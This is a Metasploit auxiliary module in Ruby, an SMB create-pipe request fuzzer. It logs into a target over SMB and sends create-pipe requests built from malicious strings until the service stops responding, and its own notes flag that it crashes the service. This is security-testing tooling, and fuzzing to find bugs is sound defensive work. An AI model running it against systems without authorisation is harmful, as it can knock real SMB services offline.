1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'English'
7
class MetasploitModule < Msf::Auxiliary
8
  include Msf::Exploit::Remote::SMB::Client
9
  include Msf::Auxiliary::Fuzzer
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'SMB Create Pipe Request Fuzzer',
16
        'Description' => %q{
17
          This module sends a series of SMB create pipe
18
          requests using malicious strings.
19
        },
20
        'Author' => [ 'hdm' ],
21
        'License' => MSF_LICENSE,
22
        'Notes' => {
23
          'Stability' => [CRASH_SERVICE_DOWN],
24
          'SideEffects' => [],
25
          'Reliability' => []
26
        }
27
      )
28
    )
29
  end
30

31
  def do_smb_create(pkt, _opts = {})
32
    @connected = false
33
    connect
34
    smb_login
35
    @connected = true
36
    smb_create('\\' + pkt)
37
  end
38

39
  def run
40
    last_str = nil
41
    last_inp = nil
42
    last_err = nil
43

44
    cnt = 0
45

46
    fuzz_strings do |str|
47
      cnt += 1
48

49
      if (cnt % 100 == 0)
50
        print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
51
      end
52

53
      begin
54
        do_smb_create(str, 0.25)
55
      rescue ::Interrupt
56
        print_status("Exiting on interrupt: iteration #{cnt} using #{@last_fuzzer_input}")
57
        raise $ERROR_INFO
58
      rescue StandardError => e
59
        last_err = e
60
      ensure
61
        disconnect
62
      end
63

64
      if !@connected
65
        if last_str
66
          print_status("The service may have crashed: iteration:#{cnt - 1} method=#{last_inp} string=#{last_str.unpack('H*')[0]} error=#{last_err}")
67
        else
68
          print_status("Could not connect to the service: #{last_err}")
69
        end
70
        return
71
      end
72

73
      last_str = str
74
      last_inp = @last_fuzzer_input
75
    end
76
  end
77
end
78

79